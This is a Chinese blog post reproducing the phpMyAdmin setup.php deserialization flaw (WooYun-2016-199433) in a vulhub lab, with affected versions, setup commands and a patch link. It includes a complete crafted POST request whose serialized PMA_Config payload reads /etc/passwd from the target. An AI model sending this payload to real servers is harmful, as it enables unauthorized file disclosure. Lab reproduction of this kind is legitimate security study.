微信公众号搜"智元新知"关注
微信扫一扫可直接关注哦!

漏洞复现-Phpmyadmin setup.php反序列化漏洞WooYun-2016-199433

PHPmyadmin setup漏洞复现

漏洞描述

PHPMyAdmin是用PHP编写的工具,用于通过WEB管理MysqL

PHPMyAdmin的Setup脚本用于生成配置。如果远程攻击者向该脚本提交了特制的POST请求的话,就可能在生成的config.inc.PHP配置文件中包含任意PHP代码。由于配置文件被保存到了服务器上,未经认证的远程攻击者可以利用这个漏洞执行任意PHP代码

影响版本

受影响系统:
PHPMyAdmin PHPMyAdmin 3.x
PHPMyAdmin PHPMyAdmin 2.11.x

不受影响系统:
PHPMyAdmin PHPMyAdmin 3.1.3.1
PHPMyAdmin PHPMyAdmin 2.11.9.5

攻击环境要求
PHPMyAdmin版本:早于2.11.9.5的2.11.x和早于3.1.3.1的3.x;
此漏洞只针对采用向导模式安装的PHPMyAdmin有效,而对采用手动安装的无效;
管理员必须未删除"/PHPMyAdmin/“目录下的”/config/“子目录,因为”/scripts/setup.PHP"尝试创建的下面PHP代码注入的"config.inc.PHP"文件正是在这个子目录下。

漏洞复现

漏洞复现这里我用vulhub去生成漏洞环境,这样比较方便。vulhub的搭建和使用,可以看这篇教学文章,写得比较详细:

Kali搭建Vulhub环境

1、生成漏洞环境

cd /vulhub-master/PHPmyadmin/WooYun-2016-199433

docker-compose up -d

在这里插入图片描述

浏览器访问漏洞地址:
http://your-ip:8080
(如果在kali(或你docker的所属机子 )上,可以用127.0.0.1:8080直接访问)

在这里插入图片描述成功访问,提示报错MysqL错误,这里没有关系,因为这个漏洞不需要用到数据库,所以直接输入payload攻击即可。

构造post数据请求包:
自己复现的时候只要把请求包中的your-ip改成目标的ip即可。

POST /scripts/setup.PHP HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 82

action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}


BurpSuite抓包:

在这里插入图片描述漏洞存在,攻击语句成功执行。

漏洞修复

厂商补丁:
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://PHPmyadmin.svn.sourceforge.net/viewvc/PHPmyadmin?view=rev&revision=12301

    文章原创,欢迎转载,请注明文章出处: 漏洞复现-Phpmyadmin setup.php反序列化漏洞(WooYun-2016-199433).。百度和各类采集站皆不可信,搜索请谨慎鉴别。技术类文章一般都有时效性,本人习惯不定期对自己的博文进行修正和更新,因此请访问出处以查看本文的最新版本。

版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。

相关推荐